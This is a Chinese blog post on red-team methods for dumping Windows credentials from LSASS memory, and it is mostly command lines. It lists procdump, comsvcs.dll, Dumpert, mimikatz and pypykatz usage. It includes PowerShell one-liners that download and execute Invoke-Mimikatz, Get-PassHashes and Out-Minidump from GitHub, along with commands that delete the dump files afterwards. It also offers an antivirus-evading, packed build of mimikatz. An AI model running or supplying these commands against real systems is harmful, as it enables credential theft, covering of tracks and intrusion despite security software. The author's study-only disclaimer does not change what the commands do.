红队技巧-导出凭据和密码

2021-03-10 15:27:26 浏览数 (1)
前言

红队中各种抓取密码凭据的方法,文末彩蛋,内附工具链接,以及我制作的过360的minikatz的版本,各位请享用,最近筹备重新开blog,记录学习计划,不然知识我学完立马就忘了,与大家一起学习!

1.Procdump转储Lsass.exe的内存

前提:需要管理员及以上权限

常用命令:

代码语言:javascript复制
procdump  -accepteula -ma lsass.exe lsass_dump

导出的.dmp文件本地配合minikatz 取出密码

代码语言:javascript复制
sekurlsa::Minidump lsassdump.dmp
sekurlsa::logonPasswords

如果对lsass.exe敏感的话,那么还可以配合lsass.exe的pid来使用更香:

代码语言:javascript复制
procdump -accepteula -ma pid lsass.dmp

2.wce导出hash

前提:需要管理员及以上权限,版本限制(仅支持Windows XP,2003,Vista,7、2008和Windows 8)

命令:

代码语言:javascript复制
wce.exe -o file.txt
wec.exe

3.comsvcs.dll转储LSASS.exe内存

前提:在powershell中运行,管理员权限以上

命令:

代码语言:javascript复制
C:WindowsSystem32rundll32.exe C:windowsSystem32comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMPlsass.dmp full

清理:

代码语言:javascript复制
Remove-Item $env:TEMPlsass.dmp -ErrorAction Ignore

4.使用系统调用和拜托hook的api转储LSASS.exe内存

详情请查看这篇文章:

https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/

这是一篇非常nice的文章,值得一看,打开一个新世界的大门!

有关github项目:

代码语言:javascript复制
https://github.com/outflanknl/Dumpert

命令:

代码语言:javascript复制
dumpert_exe
或者
rundll32.exe C:DumpertOutflank-Dumpert.dll,Dump

运行效果截图:

5.Windows Task Manager转储LSASS.exe内存

直接打开任务管理器,找到lsass.exe进程,右键选中右键

6.Mimikatz

前提:管理员权限以及以上,建议自己编译源码去掉一些特征字符,一些不必要的语句

命令:

代码语言:javascript复制
mimikatz_exe "sekurlsa::minidump lsass.dump" "sekurlsa::logonpasswords full" exit

powershell:

代码语言:javascript复制
#读取明文密码
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCerts
#读取hash
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes

猕猴桃杀软重点看照对象之一。

7.pypykatz读取LSASS

前提:必须安装python3,管理员权限以及以上

命令:

代码语言:javascript复制
#安装
pip install pypykatz
#使用
pypykatz live lsa

抓得不只是lsass,还有其他的。

运行效果:

杀软拦截概率很低

8.Out-Minidump.ps1转储LSASS.exe内存

前提:powershell,管理员权限以及以上

命令:

代码语言:javascript复制
powershell “IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump”

清除文件:

代码语言:javascript复制
Remove-Item $env:TEMPlsass_*.dmp -ErrorAction Ignore

杀软会拦截。

彩蛋福利

直接去下载github上面的release版本百分之百被杀的,我这把源码拉下来,自己编译,去除一些特征。

请看:过360的minikatz截图:

不知道是不是我刚更新没有关网络,把我64位的搞死了,但是32位的依然坚挺!然后接着保险起见,加壳

工具包里面有我编译好的一些工具,懂得都懂嗷,不会的百度。

公众号关注回复,minikatz,即可获得百度云下载链接,重申一遍,本公众号分享的工具,技术只供学习研究,切勿拿去违法犯罪,违法犯罪与公众号与作者无关。

END

sass sas powershell windows 打包

0 人点赞